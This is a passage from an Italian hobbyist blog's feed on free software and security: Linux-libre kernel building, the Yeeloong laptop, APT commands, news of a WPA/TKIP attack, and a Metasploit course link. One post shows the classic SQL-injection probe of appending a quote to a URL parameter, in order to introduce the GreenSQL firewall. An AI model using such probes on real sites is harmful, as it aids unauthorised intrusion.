compra spero mi invii almeno una recensione da pubblicare :)</span><br /><br />Non so però se sia completamente privo da non-free software come il Yeeloong<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-7210581653492655446?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com0tag:blogger.com,1999:blog-2454834713612225354.post-64252476142746713792009-09-22T06:38:00.000-07:002009-09-23T00:05:37.027-07:00<a href="http://www.offensive-security.com/metasploit-unleashed/"><img style="width: 400px; height: 108px;" alt="http://www.offensive-security.com/metasploit-unleashed/imgs/msfu-01.jpg" src="http://www.offensive-security.com/metasploit-unleashed/imgs/msfu-01.jpg" /></a><br />Quelli della Offensive Security hanno rilasciato il corso sui Metasploit ed è gratuito e visibile online da tutti a questo <a href="http://www.offensive-security.com/metasploit-unleashed/">link</a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-6425247614274671379?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com0tag:blogger.com,1999:blog-2454834713612225354.post-87027659089723606442009-09-22T03:05:00.000-07:002009-09-22T06:26:35.722-07:00I nerd delle comunicazioni n 60 secondi si può penetrare in un qualsiasi punto d'accesso che utilizza una cifrazione WPA.<br />La tecnica sviluppata da Toshihiro Ohigashi della Università di Hiroshima e Masakatu Morii della Università di Kobe è basata sul metodo Becks-tews (la versione dell'attacco chopchop per WEP), che consiste nel fare piccoli cambiamenti ai pacchetti criptati con TKIP - Temporal Key Integrity Protocol, un meccanismo di sicurezza delle WPA - e poi rispedirli indietro.<br /><a href="http://img410.imageshack.us/img410/963/fragmentationgz4.jpg"><img style="cursor: -moz-zoom-in; width: 317px; height: 198px;" alt="http://img410.imageshack.us/img410/963/fragmentationgz4.jpg" src="http://img410.imageshack.us/img410/963/fragmentationgz4.jpg" /></a><br />Comunque perchè questo metodo sia efficace bisogna aspettare anche più di 15 minuti.<br /><br />In un <a href="http://www.google.com/url?sa=t&amp;source=web&amp;ct=html&amp;cd=1&amp;url=http%3A%2F%2F209.85.129.132%2Fsearch%3Fq%3Dcache%3AyengnYasIMMJ%3Ajwis2009.nsysu.edu.tw%2Flocation%2Fpaper%2FA%252520Practical%252520Message%252520Falsification%252520Attack%252520on%252520WPA.pdf%2BA%2BPractical%2BMessage%2BFalsification%2BAttack%2Bon%2BWPA%26cd%3D1%26hl%3Den%26ct%3Dclnk%26client%3Diceweasel-a&amp;ei=us-4SqiJJMHFsgbEw4yzBQ&amp;usg=AFQjCNH_0uYUTLhaltDJ7Xjx1uOr_Eb8Zw&amp;sig2=vbU7Xvb1SuFKgdzDjJuP2A">manuale recente</a>, Ohigashi and Morii propongono di utilizzare l'attacco Becks-tews in congiunta con l'attacco man-in-the-middle - nell quale la comunicazione viene intercettata dall'attaccante.<br />Un problema è che il rischio di venire scoperti è molto alto, per cui riuscire a ridurre l'attacco sotto il minuto è un grande vantaggio.<br />La technica è stata divulgata a una conferenza in Hiroshima,Giappone il mese scorso.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-8702765908972360644?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com0tag:blogger.com,1999:blog-2454834713612225354.post-50411618937329146012009-09-18T06:11:00.000-07:002009-09-19T02:00:12.304-07:00Il primo portatile completamente Open Source, prodotto dalla Lemote Tech Co.<br />Una piccolissima azienda cinese che cerca di farsi strada nel business dei computer.<br /><img style="cursor: -moz-zoom-in; width: 221px; height: 147px;" alt="http://s153.photobucket.com/albums/s223/dsobodash/Lemote%20Yeeloong/DSC_0048.jpg" src="http://s153.photobucket.com/albums/s223/dsobodash/Lemote%20Yeeloong/DSC_0048.jpg" /><br /><br />Il design non è dei più accativanti, il packaging lascia un pò a desiderare, il software installato sembra messo a caso per far appesantire il portatile...<br />Allora cos'è che ha portato cosi tanta gente a interessarsi a questa azienda e ad avere richieste anche da europa e america?<br />Il fatto che è la prima azienda a rilasciare un portatile completamente privo da non-free software.<br />Detiene comunque ottime prestazioni e un prezzo accessibile (390€ comprese di spese di spedizione, tasse e borsa per il trasporto da questo sito <a href="http://www.tekmote.nl/">http://www.tekmote.nl/</a> )<br /><br /><div class="gallery"><a href="http://s153.photobucket.com/albums/s223/dsobodash/Lemote%20Yeeloong/DSC_0123.jpg" rel="lightbox[bucket]"><img class="slickrwidget" src="http://s153.photobucket.com/albums/s223/dsobodash/Lemote%20Yeeloong/th_DSC_0123.jpg" /></a><a href="http://s153.photobucket.com/albums/s223/dsobodash/Lemote%20Yeeloong/DSC_0124.jpg" rel="lightbox[bucket]"><img class="slickrwidget" src="http://s153.photobucket.com/albums/s223/dsobodash/Lemote%20Yeeloong/th_DSC_0124.jpg" /></a><a href="http://s153.photobucket.com/albums/s223/dsobodash/Lemote%20Yeeloong/DSC_0126.jpg" rel="lightbox[bucket]"><img class="slickrwidget" src="http://s153.photobucket.com/albums/s223/dsobodash/Lemote%20Yeeloong/th_DSC_0126.jpg" /></a><a href="http://s153.photobucket.com/albums/s223/dsobodash/Lemote%20Yeeloong/DSC_0128.jpg" rel="lightbox[bucket]"><img class="slickrwidget" src="http://s153.photobucket.com/albums/s223/dsobodash/Lemote%20Yeeloong/th_DSC_0128.jpg" /></a><a href="http://s153.photobucket.com/albums/s223/dsobodash/Lemote%20Yeeloong/DSC_0129.jpg" rel="lightbox[bucket]"><img class="slickrwidget" src="http://s153.photobucket.com/albums/s223/dsobodash/Lemote%20Yeeloong/th_DSC_0129.jpg" /></a><a href="http://s153.photobucket.com/albums/s223/dsobodash/Lemote%20Yeeloong/DSC_0130.jpg" rel="lightbox[bucket]"><img class="slickrwidget" src="http://s153.photobucket.com/albums/s223/dsobodash/Lemote%20Yeeloong/th_DSC_0130.jpg" /></a><a href="http://s153.photobucket.com/albums/s223/dsobodash/Lemote%20Yeeloong/DSC_0131.jpg" rel="lightbox[bucket]"><img class="slickrwidget" src="http://s153.photobucket.com/albums/s223/dsobodash/Lemote%20Yeeloong/th_DSC_0131.jpg" /></a><a href="http://s153.photobucket.com/albums/s223/dsobodash/Lemote%20Yeeloong/DSC_0136.jpg" rel="lightbox[bucket]"><img class="slickrwidget" src="http://s153.photobucket.com/albums/s223/dsobodash/Lemote%20Yeeloong/th_DSC_0136.jpg" /></a><a href="http://s153.photobucket.com/albums/s223/dsobodash/Lemote%20Yeeloong/DSC_0137.jpg" rel="lightbox[bucket]"><img class="slickrwidget" src="http://s153.photobucket.com/albums/s223/dsobodash/Lemote%20Yeeloong/th_DSC_0137.jpg" /></a><a href="http://s153.photobucket.com/albums/s223/dsobodash/Lemote%20Yeeloong/DSC_0138.jpg" rel="lightbox[bucket]"><img class="slickrwidget" src="http://s153.photobucket.com/albums/s223/dsobodash/Lemote%20Yeeloong/th_DSC_0138.jpg" /></a> </div><br />Questo è il sistema operativo di cui è in dotazione quando arriva <br /><br /><a href="http://s153.photobucket.com/albums/s223/dsobodash/Lemote%20Yeeloong/lemote1.png" onclick="tr('album_thumb_click');"><span class="outline"><img id="thumb_img_17" class="media" src="http://i153.photobucket.com/albums/s223/dsobodash/Lemote%20Yeeloong/th_lemote1.png" alt="lemote1.png image by dsobodash" title="" /></span></a><br /><br /><a href="http://s153.photobucket.com/albums/s223/dsobodash/Lemote%20Yeeloong/lemote2.png" onclick="tr('album_thumb_click');"><span class="outline"><div class="mediaContainer"><img id="thumb_img_18" class="media" src="http://i153.photobucket.com/albums/s223/dsobodash/Lemote%20Yeeloong/th_lemote2.png" alt="lemote2.png image by dsobodash" title="" /></div></span></a><br />a confronto con un eeepc<br /> <p id="pTitle_14" class="title txtClrDef" title=""> </p> <input name="mediaUrl_14" id="mediaUrl_14" value="http://i153.photobucket.com/albums/s223/dsobodash/Lemote%20Yeeloong/DSC_0141.jpg" type="hidden"> <input name="mediaTitle_14" id="mediaTitle_14" value="" type="hidden"> <a href="http://s153.photobucket.com/albums/s223/dsobodash/Lemote%20Yeeloong/DSC_0141.jpg" onclick="tr('album_thumb_click');"><span class="outline"><div class="mediaContainer"><img id="thumb_img_14" class="media" src="http://i153.photobucket.com/albums/s223/dsobodash/Lemote%20Yeeloong/th_DSC_0141.jpg" alt="DSC_0141.jpg image by dsobodash" title="" /></div></span></a><br />con Debian installato !<br /> <p id="pTitle_19" class="title txtClrDef" title=""> </p> <input name="mediaUrl_19" id="mediaUrl_19" value="http://i153.photobucket.com/albums/s223/dsobodash/Lemote%20Yeeloong/medan1.png" type="hidden"> <input name="mediaTitle_19" id="mediaTitle_19" value="" type="hidden"> <a href="http://s153.photobucket.com/albums/s223/dsobodash/Lemote%20Yeeloong/medan1.png" onclick="tr('album_thumb_click');"><span class="outline"><div class="mediaContainer"><img id="thumb_img_19" class="media" src="http://i153.photobucket.com/albums/s223/dsobodash/Lemote%20Yeeloong/th_medan1.png" alt="medan1.png image by dsobodash" title="" /></div></span></a><br /><br /><br /><a href="http://s153.photobucket.com/albums/s223/dsobodash/Lemote%20Yeeloong/lemote1.png" onclick="tr('album_thumb_click');"><span class="outline"></span></a><a href="http://s153.photobucket.com/albums/s223/dsobodash/Lemote%20Yeeloong/lemote2.png%22" onclick="tr('album_thumb_click');"><span class="outline"></span></a><br /><span class="Apple-style-span" style="font-family:'Times New Roman';"><table border="1" cellpadding="0" cellspacing="0" width="400"><tbody><tr><td class="STYLE16" style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;">Components</td><td class="STYLE16" style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;">Spec</td><td class="STYLE16" style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;">notes</td></tr><tr><td class="STYLE16" style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;">CPU</td><td class="STYLE16" style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;">STLS 2F(Loongson 2F) 900MHz, with integrated DDR2 controller and PCI controller</td><td class="STYLE16" style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;"><br /></td></tr><tr><td class="STYLE16" style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;">Chipset</td><td class="STYLE16" style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;"><p>Northbridge: integrated in CPU<br />Southbridge: AMD CS5536<br />Graphics: SMI712<br />Network: Rtl8139 + RTL8187B(wifi)<br />Camera: 300K pixel<br />SD: Realtek RTS5158E</p></td><td class="STYLE16" style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;"><br /></td></tr><tr><td class="STYLE16" style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;">Memory</td><td class="STYLE16" style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;">SO-DIMM DDR2<br />512MB/1GB</td><td class="STYLE16" style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;">optional</td></tr><tr><td class="STYLE16" style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;">Storage</td><td class="STYLE16" style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;">160GB 2.5' HDD or 2GB/4GB SSD</td><td class="STYLE16" style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;">optional</td></tr><tr><td class="STYLE16" style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;">Panel</td><td class="STYLE16" style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;">8.9” TFT LCD<br />1024x600</td><td class="STYLE16" style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;"><br /></td></tr><tr><td class="STYLE16" style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;">Extension</td><td class="STYLE16" style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;">USB wifi</td><td class="STYLE16" style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;">optional</td></tr><tr><td class="STYLE16" style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;">Interfaces</td><td class="STYLE16" style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;">USB2.0x3, earphone+ MIC, SDx1, RJ45x1, VGAx1, DC-inx1</td><td class="STYLE16" style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;"><br /></td></tr><tr><td class="STYLE16" style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;">Power</td><td class="STYLE16" style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;"><12watt></td><td class="STYLE16" style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;"><br /></td></tr><tr><td class="STYLE16" style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;">Enclosure</td><td class="STYLE16" style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;">PC+ABS+IMR A/C</td><td class="STYLE16" style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;"><br /></td></tr><tr><td class="STYLE16" style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;">Size</td><td class="STYLE16" style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;">98x45x28.5mm</td><td class="STYLE16" style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;"><br /></td></tr><tr><td class="STYLE16" style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;">Keyboard</td><td class="STYLE16" style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;">80key 23.8mm</td><td class="STYLE16" style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;"><br /></td></tr><tr><td class="STYLE16" style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;">Weight</td><td class="STYLE16" style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;">~1Kg</td><td class="STYLE16" style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;">Exclude external parts</td></tr><tr><td class="STYLE16" style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;">OS</td><td class="STYLE16" style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;">Debian Linux + Lemote Education suites</td><td class="STYLE16" style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;">Others includes: Mandriva, Sunwah, Slackware, Gentoo etc.</td></tr></tbody></table></span><br />(foto da <a href="http://s153.photobucket.com/albums/s223/dsobodash/Lemote%20Yeeloong/">cinnamonpirate</a>)<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-5041161893732914601?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com0tag:blogger.com,1999:blog-2454834713612225354.post-30793395645765204542009-09-18T06:09:00.000-07:002009-09-18T06:10:41.056-07:00La litizzetto esprime il suo odio per i computer ed in particolare per le domande indesiderate e gli errori irreversibili di windows<br /><br /><object height="344" width="425"><param name="movie" value="http://www.youtube.com/v/k3TynhxyRLg&amp;hl=en&amp;fs=1&amp;"><param name="allowFullScreen" value="true"><param name="allowscriptaccess" value="always"><embed src="http://www.youtube.com/v/k3TynhxyRLg&amp;hl=en&amp;fs=1&amp;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" height="344" width="425"></embed></object><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-3079339564576520454?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com3tag:blogger.com,1999:blog-2454834713612225354.post-56787293753603363992009-09-18T02:07:00.000-07:002009-09-18T02:50:46.788-07:00Probabilmente ti stai dicendo: " oh, non ho mica pagato per avere Windows".<br />Ne sei veramente sicuro ?<br />Se il tuo computer aveva gia installato una copia di Windows, allora l' hai pagato, anche se il negozio dove l'hai comprato non ti ha detto nulla a proposito.<br /><span style="font-style: italic; color: rgb(255, 0, 0);">Il prezzo della licenza di windows</span><span style="color: rgb(255, 0, 0);"> </span><span style="font-style: italic; color: rgb(255, 0, 0);">è circa 1/4 del prezzo del tuo computer</span><span style="color: rgb(255, 0, 0);">!</span><br />Anche se installi Windows illegalmente ma il tuo computer ha uno sticker simile:<br /><img style="width: 201px; height: 201px;" alt="http://www.spywaredrguide.com/VirtualDr/images/xp_product_key_sticker_01.jpg" src="http://www.spywaredrguide.com/VirtualDr/images/xp_product_key_sticker_01.jpg" /><br />Significa che comunque Windows l hai pagato! Da dove pensavi che la Microsoft si prendesse i soldi ??<br /><br />Linux invece è completamente gratuito. Tutte quelle persone che lavorano nel mondo che lavorano duro per renderlo pulito, sicuro, efficente, con una buona interfaccia grafica e danno tutto il loro lavoro free. Di sicure alcune compagnie fanno soldi vendendo il supporto, la documentazione, l aiuto telefonico e online per le propie versioni di linux, e questa è sicuramente una cosa migliore. Perchè ameno che tu non sia una grande azienda che paga per farsi gestire i propri server che devono essere sempre attivi e funzionanti, da linux puoi oltretutto imparare a gestirti il computer come vuoi tu con infinite possibilità e programmi e nel momento in cui appare qualche problema puoi imparare da solo a risolverlo perchè è un ottimo sistema di apprendimento e non pagherai mai un centesimo!<br /><br /><a href="http://www.whylinuxisbetter.net/"><img src="http://www.whylinuxisbetter.net/Images/business_news.png" /></a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-5678729375360336399?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com4tag:blogger.com,1999:blog-2454834713612225354.post-22618870245356681702009-09-17T09:41:00.000-07:002009-09-17T12:09:32.762-07:00Questo è Hacker Code. Simile al Geek Code ma più corto e fatto per essere messo alla fine del nick su IRC o altri social media.<br /><br />L'Utilizzo è semplice. qua sotto ci sono i codici con i propri valori.<br />Con il primo carattere scegli chi sei black hat, white hat, grey hat o indeciso.<br />Questo carattere deve venire messo in minuscolo. Nel secondo carattere scegli il tuo OS preferito.<br />Questo va in maiuscolo. Per la terza lettera scegli la tua specialità. In altre parole in cosa riesci meglio! Questa lettera andrà in minuscolo. Aggiungi una barra tra la fine del nome e il codice.<br /><br />Esempi:<br /><br />-wXd- Typical whitehat, windows xp, leech. aka noob.<br />-gLn- Greyhat, Linux, network hacker.<br />-bSs- Blackhat, Solaris, server hacker.<br /><br />Prima lettera - hat color<br />g = grey hat<br />b = black hat<br />w = white hat<br />u = undecided<br /><br />seconda lettera - OS preferito<br />8 = Windows 98<br />M = Windows ME<br />2 = Windows 2000<br />X = Windows XP<br />V = Windows Vista<br />7 = Windows 7<br />L = Linux<br />U = Unix<br />S = Solaris<br />O = OS X<br /><br />terza lettera - specialtà<br />c = coding/scripting<br />s = server<br />n = networking<br />w = wardriver<br />p = phone/sms<br />m = media design<br />d = internet/ham radio DJ or Mixer<br />b = hacking blogger/news poster<br />g = game hacker<br />r = reverse engineer<br />l = download-aholic (leech)<br /><br />v1.0 Sysninja.com 2009<br />email to suggest improvements<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-2261887024535668170?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com0tag:blogger.com,1999:blog-2454834713612225354.post-26354733963071253692009-09-16T08:09:00.000-07:002009-09-16T08:12:50.174-07:00in shell<br />$ export PS1='C:${PWD//\//\\\} >'<br /><br />XD<br /><br />e per scaricare un fumetto a caso da xkcd<br /><br />$ wget -q http://dynamic.xkcd.com/comic/random/ -O - | grep -Eo 'http://imgs.xkcd.com/comics/.*(png|jpg)' | wget -q -i - -O - | display<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-2635473396307125369?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com0tag:blogger.com,1999:blog-2454834713612225354.post-77490968392857519872009-09-15T05:20:00.000-07:002009-09-15T07:21:40.229-07:00Debian è una distribuzione che reputo fantastica ma purtroppo come tante altre distribuzioni contiene dei <a href="http://en.wikipedia.org/wiki/Binary_blob">Binary BLOB </a>che risiedono all'interno del Kernel e che non distribuiscono il codice liberamente. La cosa da molti utilizzatori può passare inosservata e sembrare che migliori la compatibilità con gli hardware propietari, ma questo non fa altro che supportare le grandi aziende che monopolizzano l'hardware rendendo il loro prodotto compatibile con la maggior parte dei sistemi operativi unix anche se esso non rilascia il source code e quindi non avendo licenza GPL. Praticamente ci lasciamo utilizzare dalle grandi aziende facendo diventare un enorme lavoro di una comunità libera un possibile loro supporto.<br />Quindi basta far vedere che noi abbiamo l'ultima parola e che volendo possiamo decidere di non utilizzare e supportare distribuzioni che hanno all'interno binary Blob sperando che prima o poi le multinazionali decidano di rilasciare il codice sorgente.<br /><br />Comunque per chi vuole rimanere alla propria Distribuzione ( senza passare magari a Gnewsense [visto che è uscito da poco e ha bisogno ancora di molto rodaggio] ) e decide di eliminiare i Binary Blob c'è da lavorarci un pò.<br /><br />Quindi prima di tutto la cosa migliore è sapere se nella nostra distribuzione è presente del software propietario, per fare questo basta installare il pacchetto Vrms (Virtual Richard M. Stallman) il quale è un programma che analizza i pacchetti installati su Debian e comunica all'utente quali sono i programmi non liberi installati nella macchina.<br /><br />apt-get install Vrms<br />Vrms<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Zb07uqFW8vM/Sq-TS-MvO2I/AAAAAAAAAPc/NkDRzrP_kDE/s1600-h/Screenshot-aliceinwire%40alice-laptop:+%7E.png"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px; height: 140px;" src="http://4.bp.blogspot.com/_Zb07uqFW8vM/Sq-TS-MvO2I/AAAAAAAAAPc/NkDRzrP_kDE/s200/Screenshot-aliceinwire%40alice-laptop:+%7E.png" alt="" id="BLOGGER_PHOTO_ID_5381682033874385762" border="0" /></a><br /><br />Per alcuni pacchetti espone anche le ragioni del perchè il pacchetto non può considerarsi libero.<br /><br /><br /><br /><br /><br />A questo punto vi basta rimuovere i pacchetti che vi segnala .<br /><br />Resta comunque il problema dei Binary Blob nel kernel per i quali abbiamo due opzioni: compilarne uno da noi o installarne uno generico.<br />Per compilarlo abbiamo bisogno di :<br /><br /># kernel-package<br /># bzip2 bzip2<br /># libncurses5-dev<br />Anche le loro dipendenze<br /><br />apt-get install kernel-package libncurses5-dev bzip2<br /><br />Una volta installati bisognerà dare questi comandi da ROOT:<br /><br />cd /usr/src<br />wget http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.27.5.tar.bz2<br />tar -jxvf linux-2.6.27.5.tar.bz2<br />ln -s linux-2.6.27.5 linux<br />cd linux<br />wget http://www.fsfla.org/svn/fsfla/software//linux-libre/scripts/deblob-check<br />chmod +x deblob-check<br />wget http://www.fsfla.org/svn/fsfla/software//linux-libre/scripts/deblob-2.6.27<br />chmod +x deblob-2.6.27<br />./deblob-2.6.27 >> ../log.txt<br />make menuconfig<br /><br />ok abbiamo cambiato quello che bisognava cambiare. In genere basta utilizzare la configurazione del Kernel attuale.<br /><br />make-kpkg-initrd kernel_headers kernel_image<br />cd .. <br />dpkg -i *.deb <br /><br />aspettiamo un pò e avremo il nostro Kernel Linux-Libre!!!<br /><br />Se invece non vogliamo compilarlo <br />ci basterà aggiungere alla fine della source list in etc/apt/source.list il repository fornito da Ali Gunduz :<br /><br />deb http://www.aligunduz.org/gNewSense/freedomshoppe/ linux-libre/<br /><br />e poi dare il comando <br /><br />apt-get update && apt-get install linux-image-2.6.27-libre-gnufs1.6b && apt-get install linux-headers-2.6.27-libre-gnufs1.6b<br /><br />Questo è il processo per avere davvero un sistema libero e per fare qualcosa per cambiare il mondo del software nel nostro piccolo.<br />Più gente utilizzerà sistemi liberi e più soddisfazioni riceveremo, gia molte aziende si stanno spostando sempre di più verso l'ambiente open source !!!<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-7749096839285751987?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com0tag:blogger.com,1999:blog-2454834713612225354.post-54234203871255556702009-09-15T03:25:00.000-07:002009-09-15T04:13:16.697-07:00La SQL injection è una tecnica che mira a colpire sistemi di database in Sql, sfruttando l'inefficienza (più spesso dovuto a codice scritto in PHP) dei controlli sui dati ricevuti in input ed inserendo comandi in query di Sql per accedere a dati sensibili.<br />Per esempio se abbiamo una pagina chiamata<br /><br />http://www.sito.it/news.php?id=5<br /><br />Possiamo testare se è vulnerabile aggiungendo una "quote" alla fine dell'url<br /><br />http://www.sito.it/news.php?id=5'<br /><br />in questo modo se avremo qualcosa del tipo<br /><br />"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."<br />O qualcosa di simile<br />Bene<br />Significa che la pagina è vulnerabile alla Sql injection e che potremmo inserire nuove query nell Sql del sito.<br /><br />Per proteggere questo problema GreenSql ci viene incontro facendo da firewall tra il sito e il database Sql, validando cosi tutte le richieste che il database Sql riceve e decidendo quali possono venire eseguite e quali no.<br /><br /><a href="http://www.greensql.net/files/images/greensql-architecture.preview.jpg"><span class="inline inline-center"><img style="width: 417px; height: 173px;" src="http://www.greensql.net/files/images/greensql-architecture.preview.jpg" alt="GreenSQL Architecture" title="GreenSQL Architecture" class="image image-preview" /></span></a><br />GreenSql fa praticamente da proxy al database Sql, al posto di connettere il sito direttamente al database viene filtrato dal firewall.<br />Potete provare la <a href="http://demo.greensql.net/">Demo qua</a><br /><br />è distribuito sotto licenza GPL<br /><br />Riesce a trovare query sospette al database rilevando query amministrative o che estraggono dati sensibili e calcola il rischio di ogni query.<br /><br />Qui si può vedere il test sulle performance del database con o senza GreenSql<br /><a href="http://www.greensql.net/files/images/greensql-0.9.4.beta.performance.test.preview.jpg"><span class="inline inline-center"><img style="width: 412px; height: 314px;" src="http://www.greensql.net/files/images/greensql-0.9.4.beta.performance.test.preview.jpg" alt="GreenSQL-0.9.4 Performance Test" title="GreenSQL-0.9.4 Performance Test" class="image image-preview" /></span></a><br /><br /><br /><a href="http://www.greensql.net/download"><img alt="http://www.greensql.net/files/logo.gif" src="http://www.greensql.net/files/logo.gif" /></a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-5423420387125555670?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com0tag:blogger.com,1999:blog-2454834713612225354.post-9607290603519042372009-09-11T06:41:00.000-07:002009-09-11T08:23:55.618-07:00<div>gNewSense è un progetto che si propone di liberare il software completamente<br />In Debian purtroppo ci sono dei <a href="http://en.wikipedia.org/wiki/Binary_blob">Binary Blob</a> nel kernel<br />Per questo si sta organizzando la creazione di<br /><a href="http://www.fsfla.org/svnwiki/selibre/linux-libre/">FreeD ebian</a><br /><br /><a class="urllink" href="http://www.gnewsense.org/Download" rel="nofollow"><img src="http://www.gnewsense.org/images/download/download_btn.png" alt="Download gNewSense 2.2" title="Download gNewSense 2.2" /></a></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-960729060351904237?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com0tag:blogger.com,1999:blog-2454834713612225354.post-34662647846837650662009-09-10T07:17:00.000-07:002009-09-10T07:39:44.025-07:00Un utile lista di comandi APT per Debian!<br /><br />Comandi utili APT: <br />Installare un pacchetto:<br />$ apt-get install pacchetto <br />Rimuovere un pacchetto:<br />$ apt-get remove pacchetto con l’aggiunta dell’opzione “–purge” si ha una cancellazione “drastica” che comprende tutti i files di configurazione. <br />Cercare un pacchetto:<br />$ apt-cache search pacchetto <br />Reperire informazioni sul pacchetto:<br />$ apt-cache show pacchetto <br />Aggiornare la sources.list per nuovi pacchetti:<br />$ apt-get update <br />Upgradare un pacchetto:<br />$ apt-get upgrade pacchetto <br />Aggiornare l’intero sistema:<br />$ apt-get dist-upgrade <br />Ripulire /var/cache/apt di tutti i pacchetti .deb scaricati:<br />$ apt-get clean <br />Ripulire /var/cache/apt dei soli pacchetti obsoleti e che non sono più presenti sui repository debian:<br />$ apt-get autoclean <br />Scarica i sorgenti di un pacchetto senza installarlo:<br />$ apt-get source pacchetto <br />Trovare i mirror più veloci:<br />$ apt-spy <br />Installare il server X:<br />$ apt-get install x-window-system-core <br />Installare kde base in italiano:<br />$ apt-get install kde-core kde-i18n-it <br />Installare gnome base:<br />$ apt-get install gnome-core <br />Debian-goodies. :<br />$ apt-get install debian-goodies <br />Tra i programmi più interessanti:<br />debget serve a scaricare un pacchetto .deb sulla directory in cui vi trovate quando date il comando.<br />Per esempio, debget iptables scarica il file iptables_1.3.3-1_i386.deb<br />dpigs visualizza i pacchetti tra tutti quelli installati che occupano più spazio sul sistema. apt-listbugs - Lista i bug critici di un pacchetto:<br />$ apt-get install apt-listbugs<br />$ apt-listbugs list iptables<br />grave bugs of iptables (1.3.2-1)<br />#278916 - iptables-save produces bad syntax (unloadable by iptables-restore)<br />Summary: iptables(1 bug) apt-build - Tool che permette di ricompilare i pacchetti ottimizzandoli per la propria architettura. :<br />$ apt-get install apt-build <br />Verranno chieste alcune informazioni legate alle opzioni da passare al compilatore gcc. Per installare compilando un nuovo pacchetto presente sui repository:<br />$ apt-build install pacchetto <br />Se avete già installato un pacchetto e volete sostituirlo con quello compilato:<br />$ apt-build –reinstall install pacchetto <br />Per i più forzuti che vogliono ricompilarsi l’intera distro:<br />$ apt-build world <br />Le opzioni di apt-build si possono cambiarle in qualsiasi momento con:<br />$ dpkg-reconfigure apt-build <br />Cron:<br />cron-apt: automatic update of packages using apt-get<br />apticron: cron-script to mail impending apt updates Configure-debian:<br />$ apt-get install configure-debian <br 